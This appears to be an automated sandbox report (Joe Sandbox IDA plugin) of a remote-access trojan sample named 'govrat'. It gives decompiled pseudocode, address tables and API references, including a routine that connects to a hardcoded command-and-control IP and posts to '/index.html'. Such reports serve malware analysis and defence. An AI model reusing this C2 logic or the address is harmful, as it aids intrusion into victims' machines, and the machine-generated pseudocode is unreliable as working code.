										_t67 =  *(_t66 + 8);
										__eflags = _t67 - 0xffffffff;
										if(__eflags != 0) {
											CloseHandle(_t67);
											_t69 =  *0x9759a8; // 0x41ae60
											 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
										}
										L11:
										_push(0);
										_t41 = L0096089D(_t71, 1, _t91, __eflags);
										goto L39;
									}
								} else {
									_push(0);
									_push(1);
									_t41 = L009B9419(_t41, 1);
									goto L39;
								}
							}
						}
					}
				} else {
					return L009A38ED(_t41, __ebx, 1);
				}
				goto L40;
			}

0x00961520
0x00961520
0x00961520
0x00961521
0x00961523
0x00961529
0x0096152a
0x0096152b
0x00961531
0x00961583
0x00961586
0x00961810
0x00961810
0x00961813
0x00961816
0x00961819
0x00961821
0x0096158c
0x0096158c
0x0096158f
0x00000000
0x00961595
0x00961595
0x00961598
0x00000000
0x0096159e
0x0096159e
0x009615a1
0x009615b0
0x009615b3
0x009615d4
0x009615d7
0x009615e5
0x009615ea
0x00961608
0x0096160d
0x00961678
0x0096167d
0x009616a8
0x009616ad
0x00961721
0x00961726
0x00961758
0x0096175a
0x00000000
0x00961760
0x00961760
0x00961765
0x00961781
0x00961786
0x009617a6
0x009617a9
0x009617ae
0x009617b0
0x009617b5
0x00000000
0x009617b6
0x009617b0
0x00000000
0x00961788
0x0096178b
0x0096178c
0x0096178e
0x0096178f
0x00961790
0x00961795
0x00961796
0x0096179c
0x0096179c
0x00961767
0x0096176c
0x0096176d
0x0096176e
0x0096176f
0x00961774
0x00961775
0x00961776
0x00961777
0x00000000
0x00961777
0x00961765
0x00961728
0x00961728
0x0096172d
0x0096172e
0x0096172f
0x00961739
0x0096173c
0x00961745
0x00961745
0x00961747
0x00000000
0x00000000
0x00961742
0x00961742
0x00961743
0x00961743
0x0096174c
0x00000000
0x0096174c
0x009616af
0x009616af
0x009616b0
0x009616b5
0x009616b8
0x009616c5
0x009616cc
0x009616d3
0x009616da
0x009616e1
0x009616e8
0x009616f1
0x009616f5
0x009616f8
0x009616f8
0x009616fa
0x009616fc
0x00961701
0x00961702
0x00961702
0x00961707
0x0096170b
0x0096170c
0x00961711
0x00961712
0x00961716
0x00961717
0x00961717
0x00000000
0x009616b8
0x0096167f
0x0096167f
0x00961681
0x00961683
0x00961684
0x00961685
0x0096168a
0x0096168f
0x00961690
0x00961691
0x00961696
0x00961697
0x0096169d
0x0096169d
0x0096160f
0x0096160f
0x00961616
0x00961619
0x0096161c
0x00961642
0x0096164a
0x0096164c
0x0096164d
0x0096164e
0x0096164f
0x00961650
0x00961651
0x00961659
0x0096165a
0x0096165b
0x0096165c
0x00961661
0x00961662
0x00961663
0x0096166d
0x0096161e
0x0096161e
0x00961624
0x00961624
0x0096161c
0x009615ec
0x009615ee
0x009615ef
0x009615f0
0x009615f1
0x009615f6
0x009615f7
0x009615f8
0x009615f9
0x009615fe
0x00000000
0x009615fe
0x00000000
0x00000000
0x00000000
0x009615b5
0x009615b5
0x009615ba
0x009615bd
0x009615c0
0x009615c3
0x009615c9
0x009615ce
0x009615ce
0x009615d9
0x009615d9
0x009615db
0x00000000
0x009615db
0x009615a3
0x009615a3
0x009615a5
0x009615a6
0x00000000
0x009615a6
0x009615a1
0x00961598
0x0096158f
0x00961533
0x00961538
0x00961538
0x00000000

APIs

CloseHandle.KERNEL32(?), ref: 009615C3
CloseHandle.KERNEL32 ref: 00961642
CloseHandle.KERNEL32 ref: 0096164A
Sleep.KERNEL32(00000032), ref: 00961743
Sleep.KERNEL32(?), ref: 0096174C

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00958704, Relevance: 6.1, APIs: 4, Instructions: 76

C-Code - Quality: 41%

			E00958704(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				void* _t22;
				void* _t25;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				void* _t48;

				_t36 = __edx;
				_t43 = _t42;
				L00A01FCC(_t11, _t27, _t43);
				_t13 =  *_t43( *0x976b28, _t37, _t27, __ecx, _t48); // executed
				_t28 = _t13;
				_v8 = _t28;
				_t14 =  *_t43( *0x976b24); // executed
				_t44 = _t14;
				if(_t44 < _t28) {
					L12:
					_t15 = 0;
				} else {
					_t40 = _t44 - _t28;
					_t2 = _t40 + 4; // 0x4
					if(_t2 < 4) {
						goto L12;
					} else {
						_t30 = L0095B067(_t28);
						_t3 = _t40 + 4; // 0x4
						_t18 = _t3;
						if(_t30 >= _t18) {
							L0098624A(_t30, _t44); // executed
							_t20 =  *_t40(_t18, _a4); // executed
							 *_t44 = _t20;
							_t21 =  *_t40(_t44 + 4); // executed
							 *0x976b24 = _t21;
							_t15 = _a4;
						} else {
							_t22 = 0x800;
							if(_t30 < 0x800) {
								_t22 = _t30;
							}
							_t23 = _t22 + _t30;
							if(_t22 + _t30 >= _t30) {
								_t25 = L00959022(_v8, _t23);
								_pop(_t34);
								if(_t25 != 0) {
									L9:
									_push(_t25);
									return L009F75EB(_t25, _t34, _t36);
								}
							}
							_t5 = _t30 + 0x10; // 0x10
							_t24 = _t5;
							if(_t5 >= _t30) {
								_t25 = L00959022(_v8, _t24);
								_pop(_t34);
								if(_t25 != 0) {
									goto L9;
								}
							}
							goto L12;
						}
					}
				}
				return _t15;
			}

0x00958704
0x0095870c
0x0095870d
0x00958719
0x00958721
0x00958723
0x00958726
0x00958728
0x0095872c
0x009587b3
0x009587b3
0x00958732
0x00958734
0x00958736
0x0095873c
0x00000000
0x0095873e
0x00958744
0x00958746
0x00958746
0x0095874c
0x0095879a
0x0095879f
0x009587a1
0x009587a7
0x009587a9
0x009587ae
0x0095874e
0x0095874e
0x00958755
0x00958757
0x00958757
0x00958759
0x0095875d
0x00958763
0x00958769
0x0095876c
0x00958784
0x00958787
0x00000000
0x0095878b
0x0095876c
0x0095876e
0x0095876e
0x00958773
0x00958779
0x0095877f
0x00958782
0x00000000
0x00000000
0x00958782
0x00000000
0x00958773
0x0095874c
0x0095873c
0x009587b9

APIs

RtlDecodePointer.NTDLL(?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 00958719
RtlDecodePointer.NTDLL(?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 00958726

Part of subcall function 00959022: Sleep.KERNEL32(00000000,00000000,00000000,?,0095877E,00000000,00000010,?,?,?,?,00958808,?,00970BC0,0000000C,00958834), ref: 0095904C

RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 0095879F
RtlEncodePointer.NTDLL(-00000004,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 009587A7

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961539, Relevance: 6.0, APIs: 4, Instructions: 43
thread

C-Code - Quality: 44%

			E00961539(void* __edx, void* __edi, void* __eflags) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t20;
				void* _t21;

				_t21 = __eflags;
				_t18 = __edx;
				_t9 = CreateThread(0, 0, 0x95fa1a, 0, 0, _t20 - 8); // executed
				CloseHandle(_t9);
				_t12 = CreateThread(0, 0, E0095F9B1, 0, 0, _t20 - 8); // executed
				_push(0);
				_push(0);
				_push(0);
				_push(_t18);
				_t13 = L00A00B1B(_t12, _t18, _t21);
				 *0x972f0c = _t13; // executed
				_t14 = CreateThread(0, 0, 0x95ff4d, _t13, 0, _t20 - 8); // executed
				 *0x972f10 = _t14;
				_push( *((intOrPtr*)(_t20 + 0x14)));
				_push( *((intOrPtr*)(_t20 + 0x10)));
				_push( *((intOrPtr*)(_t20 + 0xc)));
				_push( *((intOrPtr*)(_t20 + 8)));
				return L00986584(_t14);
			}

0x00961539
0x00961539
0x00961548
0x0096154b
0x0096155e
0x00961560
0x00961561
0x00961563
0x00961564
0x00961565
0x00961577
0x0096157c
0x0096166e
0x00961810
0x00961813
0x00961816
0x00961819
0x00961821

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000FA1A,00000000,00000000,?), ref: 00961548
CloseHandle.KERNEL32(00000000), ref: 0096154B
CreateThread.KERNEL32(00000000,00000000,Function_0000F9B1,00000000,00000000,?), ref: 0096155E
CreateThread.KERNEL32(00000000,00000000,Function_0000FF4D,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0096157C

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095C931, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449

C-Code - Quality: 87%

			E0095C931(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				char _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				intOrPtr _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				intOrPtr _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				intOrPtr _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				intOrPtr _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				intOrPtr _v262;
				intOrPtr _v266;
				short _v268;
				short _v270;
				short _v272;
				short _v274;
				intOrPtr _v278;
				intOrPtr _v282;
				char _v284;
				signed int _v288;
				char _v292;
				char _v304;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v836;
				char _v1348;
				void* __edi;
				void* __esi;
				short _t202;
				short _t203;
				short _t204;
				short _t205;
				short _t206;
				short _t207;
				short _t208;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t253;
				intOrPtr _t255;
				char _t256;
				intOrPtr _t258;
				char* _t261;
				intOrPtr _t270;
				intOrPtr _t275;
				intOrPtr _t277;
				short _t323;
				short _t324;
				short _t325;
				short _t326;
				void* _t335;
				void* _t336;
				intOrPtr _t387;

				_t336 = __edx;
				_t202 = 0x68;
				_v72 = _t202;
				_t203 = 0x74;
				_v288 = _v288 & 0x00000000;
				_v70 = _t203;
				_v68 = _t203;
				_t204 = 0x70;
				_v66 = _t204;
				_t205 = 0x3a;
				_v64 = _t205;
				_t206 = 0x2f;
				_v62 = _t206;
				_v60 = _t206;
				_t207 = 0x25;
				_v58 = _t207;
				_t208 = 0x53;
				_v56 = _t208;
				_v54 = 0;
				_v292 = L"*/*";
				L00951000(0x200, L"%S", "192.243.101.124");
				L00951000(0x200,  &_v72, "192.243.101.124");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if( *0x975968 != 0) {
					L4:
					_v84 = 0x8c;
					_v86 = 0xba;
					_v96 = 0xb9;
					_v98 = 0xa3;
					_v100 = 0xe5;
					_v88 = 0xbf;
					_v102 = 0xfe;
					_v90 = 0xbf;
					_v104 = 0xed;
					_v110 = 0xdf;
					_v112 = 0xac;
					_v114 = 0xbc;
					_v116 = 0xbf;
					_v118 = 0xb4;
					_v124 = 0xbe;
					_v126 = 0xbf;
					_v128 = 0xbc;
					_v130 = 0xbf;
					_v146 = 0xe4;
					_v132 = 0xbd;
					_v148 = 0xcf;
					_v120 = 0xbe;
					_v122 = 0xbe;
					_v134 = 0xb8;
					_v150 = 0xac;
					_v136 = 0xa3;
					_v138 = 0xe9;
					_v152 = 0xa5;
					_v140 = 0xe1;
					_v154 = 0xe3;
					_v156 = 0xe7;
					_v158 = 0xef;
					_v160 = 0xe9;
					_v162 = 0xcb;
					_v164 = 0xac;
					_v94 = 0xbb00bf;
					_v108 = 0xea00ed;
					_v144 = 0xe300fe;
					_v166 = 0xe9;
					_v168 = 0xe7;
					_v170 = 0xe5;
					_v172 = 0xe0;
					_v174 = 0xac;
					_v176 = 0xa0;
					_v178 = 0xc0;
					_v180 = 0xc1;
					_v182 = 0xd8;
					_v184 = 0xc4;
					_v186 = 0xc7;
					_v188 = 0xa4;
					_v190 = 0xac;
					_v192 = 0xba;
					_v194 = 0xbf;
					_v196 = 0xbf;
					_v198 = 0xbb;
					_v200 = 0xbf;
					_v202 = 0xb9;
					_v204 = 0xa3;
					_v206 = 0xf8;
					_v208 = 0xe5;
					_v210 = 0xc7;
					_v212 = 0xee;
					_v220 = 0xe0;
					_v224 = 0xfc;
					_v214 = 0xe9;
					_v226 = 0xcd;
					_v228 = 0xac;
					_v230 = 0xa5;
					_v232 = 0xbd;
					_v234 = 0xa2;
					_v236 = 0xba;
					_v238 = 0xac;
					_v240 = 0xd8;
					_v242 = 0xc2;
					_v244 = 0xac;
					_v246 = 0xff;
					_v248 = 0xfb;
					_v218 = 0xdb00e9;
					_v222 = 0xfc;
					_v250 = 0xe3;
					_v252 = 0xe8;
					_v268 = 0xb9;
					_v254 = 0xe2;
					_v270 = 0xa3;
					_v256 = 0xe5;
					_v272 = 0xed;
					_v258 = 0xdb;
					_v274 = 0xe0;
					_v284 = 0xc1;
					_t387 = 1;
					_v262 = 0xa400ac;
					_v266 = 0xbc00a2;
					_v278 = 0xe000e5;
					_v282 = 0xf600e3;
					_v82 = 0;
					_t234 =  *0x975968; // 0x1b1640, executed
					_t235 =  *((intOrPtr*)(_t234 + 0x18))(L0095113A( &_v284), 1, 0, 0, 0);
					 *0x9759c0 = _t235;
					if(_t235 == 0) {
						L20:
						 *_a8 = 0x50;
						if(L0095C8AE(_a4, "192.243.101.124") == 0) {
							L3:
							return 0;
						}
						L00951000(0x200, L"%S", _a4);
						L22:
						_t243 =  *0x975968; // 0x1b1640, executed
						_t244 =  *((intOrPtr*)(_t243 + 0x14))( *0x9759c0,  &_v1348, 0x50, 0);
						 *0x9759c4 = _t244;
						if(_t244 == 0) {
							goto L3;
						}
						_t323 = 0x50;
						_v28 = _t323;
						_t324 = 0x4f;
						_v26 = _t324;
						_t325 = 0x53;
						_v24 = _t325;
						_t326 = 0x54;
						_v22 = _t326;
						_v20 = 0;
						_t245 =  *0x975968; // 0x1b1640, executed
						_t246 =  *((intOrPtr*)(_t245 + 0x1c))(_t244,  &_v28, L"/index.html", 0, 0,  &_v292, 0);
						 *0x9759bc = _t246;
						if(_t246 == 0) {
							L19:
							_t247 =  *0x975968; // 0x1b1640
							 *((intOrPtr*)(_t247 + 0x28))( *0x9759c0);
							goto L3;
						}
						_t249 =  *0x975968; // 0x1b1640
						 *((intOrPtr*)(_t249 + 0xc))(_t246, 0x2710, 0x2710, 0x927c0, 0x927c0);
						return _t387;
					}
					_push( &_v320);
					_t253 =  *0x975968; // 0x1b1640, executed
					if( *((intOrPtr*)(_t253 + 4))() == 0) {
						goto L20;
					}
					_t255 = _v312;
					if(_t255 != 0) {
						_v12 = _t255;
						_v16 = 3;
						_v8 = 0;
					}
					_t256 = _v316;
					if(_t256 != 0) {
						_v44 = _t256;
						_push( &_v304);
						_push( &_v52);
						_push( &_v836);
						_push( *0x9759c0);
						_t275 =  *0x975968; // 0x1b1640
						_v52 = 2;
						_v48 = 0;
						_v32 = _t387;
						_v40 = 0;
						_v36 = 0;
						if( *((intOrPtr*)(_t275 + 0x20))() != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t387 = 1;
						}
					}
					if(_v320 != 0) {
						_push( &_v304);
						_push( &_v52);
						_push( &_v836);
						_push( *0x9759c0);
						_t270 =  *0x975968; // 0x1b1640
						_v52 = _t387;
						_v48 = 3;
						_v32 = _t387;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						if( *((intOrPtr*)(_t270 + 0x20))() != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t387 = 1;
						}
					}
					if(_v12 == 0) {
						goto L20;
					} else {
						_t258 =  *0x975968; // 0x1b1640
						 *((intOrPtr*)(_t258 + 8))( *0x9759c0, 0x26,  &_v16, 0xc);
						_t380 = _a4;
						L009510F7(0x20, "%S", _v12);
						_t261 = E00951240(_a4, 0x3a);
						if(_t261 == 0) {
							 *_a8 = 0x1f90;
						} else {
							 *_t261 = 0;
							L0095207D(_t261 + 1, "%d", _a8);
						}
						if(L0095C8AE(_t380, _t380) != 0) {
							goto L22;
						} else {
							goto L19;
						}
					}
				}
				_t277 = E00951195(_t336,  &_v320, "192.243.101.124", 0x34);
				_pop(_t335);
				 *0x975968 = _t277;
				if(_t277 == 0 || E00965B62(_t335, _t277) == 0) {
					goto L3;
				} else {
					goto L4;
				}
			}

0x0095c931
0x0095c93f
0x0095c942
0x0095c946
0x0095c949
0x0095c950
0x0095c954
0x0095c958
0x0095c95b
0x0095c95f
0x0095c962
0x0095c966
0x0095c969
0x0095c96d
0x0095c971
0x0095c972
0x0095c978
0x0095c979
0x0095c984
0x0095c99b
0x0095c9a5
0x0095c9b7
0x0095c9c1
0x0095c9c2
0x0095c9c3
0x0095c9cc
0x0095c9cd
0x0095c9ce
0x0095c9d9
0x0095c9da
0x0095c9ff
0x0095ca04
0x0095ca0b
0x0095ca19
0x0095ca25
0x0095ca2b
0x0095ca34
0x0095ca3b
0x0095ca44
0x0095ca4a
0x0095ca51
0x0095ca5a
0x0095ca61
0x0095ca67
0x0095ca6e
0x0095ca77
0x0095ca7d
0x0095ca84
0x0095ca8d
0x0095ca91
0x0095ca9b
0x0095caa5
0x0095caac
0x0095cab0
0x0095cab4
0x0095cac0
0x0095cac7
0x0095cad6
0x0095cadd
0x0095caea
0x0095caf1
0x0095cafd
0x0095cb07
0x0095cb10
0x0095cb1a
0x0095cb23
0x0095cb2a
0x0095cb31
0x0095cb38
0x0095cb44
0x0095cb4b
0x0095cb54
0x0095cb60
0x0095cb69
0x0095cb73
0x0095cb7d
0x0095cb87
0x0095cb91
0x0095cb9b
0x0095cba5
0x0095cbaf
0x0095cbb8
0x0095cbc2
0x0095cbcc
0x0095cbd5
0x0095cbdf
0x0095cbe9
0x0095cbf3
0x0095cbfd
0x0095cc07
0x0095cc10
0x0095cc1a
0x0095cc24
0x0095cc2f
0x0095cc39
0x0095cc40
0x0095cc4c
0x0095cc55
0x0095cc5f
0x0095cc69
0x0095cc72
0x0095cc7c
0x0095cc85
0x0095cc8f
0x0095cc99
0x0095cca2
0x0095ccac
0x0095ccb6
0x0095ccbd
0x0095ccc7
0x0095ccd3
0x0095ccdd
0x0095ccea
0x0095ccf4
0x0095ccfd
0x0095cd04
0x0095cd11
0x0095cd18
0x0095cd24
0x0095cd32
0x0095cd39
0x0095cd41
0x0095cd4b
0x0095cd55
0x0095cd5f
0x0095cd69
0x0095cd72
0x0095cd77
0x0095cd7a
0x0095cd81
0x0095ced6
0x0095ced9
0x0095ceef
0x0095c9f8
0x00000000
0x0095c9f8
0x0095cf08
0x0095cf0f
0x0095cf1f
0x0095cf24
0x0095cf27
0x0095cf2e
0x00000000
0x00000000
0x0095cf36
0x0095cf39
0x0095cf3d
0x0095cf40
0x0095cf44
0x0095cf47
0x0095cf4b
0x0095cf4c
0x0095cf53
0x0095cf6a
0x0095cf6f
0x0095cf72
0x0095cf79
0x0095cec3
0x0095cec9
0x0095cece
0x00000000
0x0095cece
0x0095cf8e
0x0095cf93
0x00000000
0x0095cf96
0x0095cd8d
0x0095cd8e
0x0095cd98
0x00000000
0x00000000
0x0095cd9e
0x0095cda6
0x0095cda8
0x0095cdab
0x0095cdb2
0x0095cdb2
0x0095cdb5
0x0095cdbd
0x0095cdbf
0x0095cdc8
0x0095cdcc
0x0095cdd3
0x0095cdd4
0x0095cdda
0x0095cddf
0x0095cde6
0x0095cde9
0x0095cdec
0x0095cdef
0x0095cdf7
0x0095ce02
0x0095ce03
0x0095ce04
0x0095ce07
0x0095ce07
0x0095cdf7
0x0095ce0e
0x0095ce16
0x0095ce1a
0x0095ce21
0x0095ce22
0x0095ce28
0x0095ce2d
0x0095ce30
0x0095ce37
0x0095ce3a
0x0095ce3d
0x0095ce40
0x0095ce48
0x0095ce53
0x0095ce54
0x0095ce55
0x0095ce58
0x0095ce58
0x0095ce48
0x0095ce5c
0x00000000
0x0095ce5e
0x0095ce64
0x0095ce71
0x0095ce77
0x0095ce81
0x0095ce8c
0x0095ce95
0x0095ceb0
0x0095ce97
0x0095ce9a
0x0095cea3
0x0095cea8
0x0095cec1
0x00000000
0x00000000
0x00000000
0x00000000
0x0095cec1
0x0095ce5c
0x0095c9de
0x0095c9e3
0x0095c9e4
0x0095c9eb
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_swscanf.LIBCMT ref: 0095CEA3

Part of subcall function 00965B62: GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 00965C05
Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965C73
Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965C9E
Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965CCF
Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965D07

Strings

/index.html, xrefs: 0095CF60
192.243.101.124, xrefs: 0095C97F, 0095C988, 0095C9AD, 0095CEE2

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009579FA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129

C-Code - Quality: 79%

			E009579FA(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed int _t50;
				void* _t51;
				signed int _t53;
				void* _t54;
				void* _t56;
				signed int _t57;
				void* _t58;
				signed int* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr* _t69;
				void* _t81;
				signed char _t83;
				void* _t86;
				void* _t91;
				intOrPtr* _t94;
				unsigned int _t96;
				intOrPtr* _t102;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t113;
				intOrPtr* _t114;
				void* _t119;

				_t105 = __edi;
				_t102 = __edx;
				if( *0x976b2c == 0) {
					_t50 = L00952EFF(__ecx);
				}
				_t111 =  *0x973240; // 0x0
				_push(_t105);
				_t106 = 0;
				if(_t111 != 0) {
					while(1) {
						_t51 =  *_t111;
						if(_t51 == 0) {
							break;
						}
						if(_t51 != 0x3d) {
							_t106 = _t106 + 1;
						}
						_t111 = _t111 + L009563C0(_t111) + 1;
					}
					_t50 = E00958FD6(_t106 + 1, 4);
					_t108 = _t50;
					_pop(_t91);
					 *0x973260 = _t108;
					if(_t108 == 0) {
						goto L3;
					} else {
						_t113 =  *0x973240; // 0x0
						while( *_t113 != 0) {
							_t54 = L009563C0(_t113);
							_pop(_t91);
							_t3 = _t54 + 1; // 0x1
							_t81 = _t3;
							if( *_t113 == 0x3d) {
								L14:
								_t113 = _t113 + _t81;
								continue;
							} else {
								_t56 = E00958FD6(_t81, 1); // executed
								_pop(_t91);
								 *_t108 = _t56;
								if(_t56 == 0) {
									_t57 = E0095115B(_t91, _t102, _t113,  *0x973260);
									 *0x973260 =  *0x973260 & 0x00000000;
									_t53 = _t57 | 0xffffffff;
									L17:
									goto L18;
								} else {
									_t58 = L00951CDF(_t56, _t81, _t113);
									_t119 = _t119 + 0xc;
									if(_t58 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L009538BA(_t81, _t108, _t113);
										asm("int3");
										_push(_t91);
										_t94 = _v20;
										_push(_t81);
										_push(_t113);
										 *_t108 = 0;
										_t114 = _t102;
										_t103 = _v24;
										 *_t94 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t103;
										}
										_v8 = 0;
										do {
											if( *_t114 != 0x22) {
												 *_t108 =  *_t108 + 1;
												if(_t103 != 0) {
													 *_t103 =  *_t114;
													_a8 = _t103 + 1;
												}
												_t83 =  *_t114;
												_t114 = _t114 + 1;
												if(L0095B01C(_t83 & 0x000000ff) != 0) {
													 *_t108 =  *_t108 + 1;
													if(_a8 != 0) {
														_a8 = _a8 + 1;
														 *_a8 =  *_t114;
													}
													_t114 = _t114 + 1;
												}
												_t103 = _a8;
												_t94 = _a12;
												if(_t83 == 0) {
													_t114 = _t114 - 1;
												} else {
													goto L33;
												}
											} else {
												_t83 = 0x22;
												_t114 = _t114 + 1;
												_v8 = 0 | _v8 == 0x00000000;
												goto L33;
											}
											L38:
											_v8 = _v8 & 0x00000000;
											L39:
											while( *_t114 != 0) {
												while(1) {
													_t65 =  *_t114;
													if(_t65 != 0x20 && _t65 != 9) {
														break;
													}
													_t114 = _t114 + 1;
												}
												if( *_t114 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t103;
													}
													 *_t94 =  *_t94 + 1;
													while(1) {
														_t86 = 1;
														_t96 = 0;
														L50:
														while( *_t114 == 0x5c) {
															_t114 = _t114 + 1;
															_t96 = _t96 + 1;
														}
														if( *_t114 == 0x22) {
															if((_t96 & 0x00000001) == 0) {
																if(_v8 == 0) {
																	L56:
																	_t86 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t69 = _t114 + 1;
																	if( *_t69 != 0x22) {
																		goto L56;
																	} else {
																		_t114 = _t69;
																	}
																}
															}
															_t96 = _t96 >> 1;
														}
														if(_t96 != 0) {
															do {
																_t96 = _t96 - 1;
																if(_t103 != 0) {
																	 *_t103 = 0x5c;
																	_t103 = _t103 + 1;
																}
																 *_t108 =  *_t108 + 1;
															} while (_t96 != 0);
															_a8 = _t103;
														}
														_t66 =  *_t114;
														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
															if(_t86 != 0) {
																_push(_t66);
																if(_t103 == 0) {
																	if(L0095B01C() != 0) {
																		_t114 = _t114 + 1;
																		 *_t108 =  *_t108 + 1;
																	}
																} else {
																	if(L0095B01C() != 0) {
																		_a8 = _a8 + 1;
																		 *_a8 =  *_t114;
																		_t114 = _t114 + 1;
																		 *_t108 =  *_t108 + 1;
																	}
																	_a8 = _a8 + 1;
																	 *_a8 =  *_t114;
																}
																 *_t108 =  *_t108 + 1;
																_t103 = _a8;
															}
															_t114 = _t114 + 1;
															_t86 = 1;
															_t96 = 0;
															goto L50;
														}
														if(_t103 != 0) {
															 *_t103 = 0;
															_t103 = _t103 + 1;
															_a8 = _t103;
														}
														 *_t108 =  *_t108 + 1;
														_t94 = _a12;
														goto L39;
													}
												}
